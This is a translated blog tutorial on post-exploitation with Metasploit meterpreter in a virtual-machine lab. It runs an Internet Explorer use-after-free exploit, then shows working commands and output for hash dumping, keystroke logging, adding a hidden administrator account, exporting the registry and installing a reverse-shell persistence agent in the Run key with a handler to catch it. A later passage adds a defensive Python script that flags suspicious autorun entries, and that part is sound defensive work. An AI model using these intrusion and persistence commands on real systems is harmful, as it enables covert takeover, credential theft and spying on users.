Intranet Penetration, Part 2: Some Uses of meterpreter

Source: Internet   Editor: 程序博客网   Time: 2024/05/22 03:47

0x01 Loose ends:

Here I fill in the gap left open in the previous article:

We used the IE exploit exploit/windows/browser/ie_execcommand_uaf, but after running it the target host was redirected as expected, yet an error appeared:

(Continuing from part one) The target machine is forcibly redirected to the URL being listened on

MSF sees the incoming connection

(But it seems the XP installed in the VM had this vulnerability patched, so no session was created)

I spent a long time afterwards looking into the cause, and with guidance from Mickey finally found the reason for the error:

In msf, enter: exploit/windows/browser/ie_execcommand_uaf

0x02 Finding the problem:

Run info to view the exploit's details. It turns out this exploit targets IE7 and IE8 on XP SP3 and Vista, and IE8 and IE9 on Win7.

msf exploit(ie_execcommand_uaf) > info
       Name: MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability
     Module: exploit/windows/browser/ie_execcommand_uaf
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Good
Provided by:
  unknown
  eromang
  binjo
  sinn3r <sinn3r@metasploit.com>
  juan vazquez <juan.vazquez@metasploit.com>
Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   IE 7 on Windows XP SP3
  2   IE 8 on Windows XP SP3
  3   IE 7 on Windows Vista
  4   IE 8 on Windows Vista
  5   IE 8 on Windows 7
  6   IE 9 on Windows 7
Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  OBFUSCATE   false            no        Enable JavaScript obfuscation
  SRVHOST     172.16.244.129   yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT     8080             yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                      no        The URI to use for this exploit (default is random)
Payload information:
Description:
  This module exploits a vulnerability found in Microsoft Internet
  Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object
  gets deleted in an unexpected manner, but the same memory is reused
  again later in the CMshtmlEd::Exec() function, leading to a
  use-after-free condition. Please note that this vulnerability has
  been exploited in the wild since Sep 14 2012. Also note that
  presently, this module has some target dependencies for the ROP
  chain to be valid. For WinXP SP3 with IE8, msvcrt must be present
  (as it is by default). For Vista or Win7 with IE8, or Win7 with IE9,
  JRE 1.6.x or below must be installed (which is often the case).

So I quietly went and downloaded XP SP3 and installed IE7 (a freshly installed XP SP3 ships with IE6).

(Install, reboot, redo the steps from part one... details omitted)

0x03 EXP successful:

Finally, it returned successful!

List sessions and attach to one:
sessions -i 1

sysinfo ipconfig ps hashdump…

0x04 Common commands:

Screenshot:

screenshot

Keylogging:

meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against SPRITEKI-674621
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20150315141552_default_172.16.244.136_host.windows.key_879494.txt
[*] Recording keystrokes...
^C[*] Saving last few keystrokes...
[*] Interrupt
[*] Stopping keystroke sniffer...

Run cmd:

meterpreter > shell

Add a user:

net user name password /add

Add the user to the administrators group:

net localgroup administrators name /add

Since this is an internal network, opening 3389 would not serve much purpose either.

Kill AV software

meterpreter > run scraper
[*] New session on 172.16.244.136:1114...
[*] Gathering basic system information...
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: Access is denied.
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\FQvPwGSl.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\HFQhdyFt.reg)
[*] Cleaning HKLM
[*] Exporting HKCC
[*] Downloading HKCC (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\iNNrwzBu.reg)
[*] Cleaning HKCC
[*] Exporting HKCR
[*] Downloading HKCR (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\QBVFVWVP.reg)
[*] Cleaning HKCR
[*] Exporting HKU
[*] Downloading HKU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Vwvxmugh.reg)
[*] Cleaning HKU
[*] Completed processing on 172.16.244.136:1114...

Persistence
meterpreter > run persistence -X -i 203376 -r 172.16.244.129
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/SPRITEKI-674621_20150315.5511/SPRITEKI-674621_20150315.5511.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=172.16.244.129 LPORT=4444
[*] Persistent agent script is 609466 bytes long
[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lBsbPnkcYJvv.vbs
[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lBsbPnkcYJvv.vbs
[+] Agent executed with PID 1112
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShFzEOxwbuI
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShFzEOxwbuI

Then catch the callback with a handler:

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST
set LPORT
exploit
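From the defender's side, the output above shows exactly what this persistence leaves behind: a random value name under HKLM\...\CurrentVersion\Run pointing at a .vbs in the user's Temp directory. The following is an added triage script, not part of the original post or of Metasploit, that parses a .reg export of the Run keys (such as the ones scraper pulls) and flags autorun entries that launch script files, live in temp/profile directories or invoke a script host. The sample export is constructed; only the value name and .vbs path are taken from the page's output.

```python
import re

# Constructed sample .reg export (not from the page), modelled on the autorun entry the
# persistence script installs: a random value name pointing at a .vbs in Temp.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="\"C:\\Program Files\\Windows Defender\\MSASCuiL.exe\""
"ShFzEOxwbuI"="C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\lBsbPnkcYJvv.vbs"
"Updater"="wscript.exe //B C:\\Users\\Public\\update.js"
'''

RUN_KEY_RE = re.compile(r'^\[(HKEY_[^\]]*\\Windows\\CurrentVersion\\Run(?:Once)?)\]$', re.I)
VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')
SCRIPT_EXT_RE = re.compile(r'\.(vbs|vbe|js|jse|wsf|hta|ps1|bat|cmd)\b', re.I)
TEMP_DIR_RE = re.compile(r'\\(temp|tmp|locals~1|appdata|public)\\', re.I)
SCRIPT_HOST_RE = re.compile(r'\b(wscript|cscript|mshta|powershell)(\.exe)?\b', re.I)

def parse_run_keys(reg_text):
    """Yield (key, value_name, data) for every string value under a Run/RunOnce key."""
    key = None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith('['):
            m = RUN_KEY_RE.match(line)
            key = m.group(1) if m else None  # only track Run/RunOnce sections
            continue
        m = VALUE_RE.match(line)
        if key and m:
            # .reg files escape backslashes and double quotes inside string data
            data = m.group(2).replace('\\\\', '\\').replace('\\"', '"')
            yield key, m.group(1), data

def find_suspicious_run_entries(reg_text):
    """Return [(value_name, data, [reasons])] for autorun entries worth triage."""
    findings = []
    for _key, name, data in parse_run_keys(reg_text):
        reasons = []
        if SCRIPT_EXT_RE.search(data):
            reasons.append('launches a script file')
        if TEMP_DIR_RE.search(data):
            reasons.append('lives in a temp/profile directory')
        if SCRIPT_HOST_RE.search(data):
            reasons.append('invokes a script host')
        if reasons:
            findings.append((name, data, reasons))
    return findings
```

Pairing a hit with the matching resource file under /root/.msf4/logs/persistence/ (or, on a real incident, deleting the value and the script it points to) removes the agent; on a live host, run the same checks against `reg export` output of both the HKLM and HKCU Run keys.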

Calling the Windows API from meterpreter, demonstrated by popping a Hello World message box:
meterpreter > irb
[*] Starting IRB shell
[*] The 'client'variable holds the meterpreter client
>> client.railgun.user32.MessageBoxA(0,"hello","world","MB_OK")
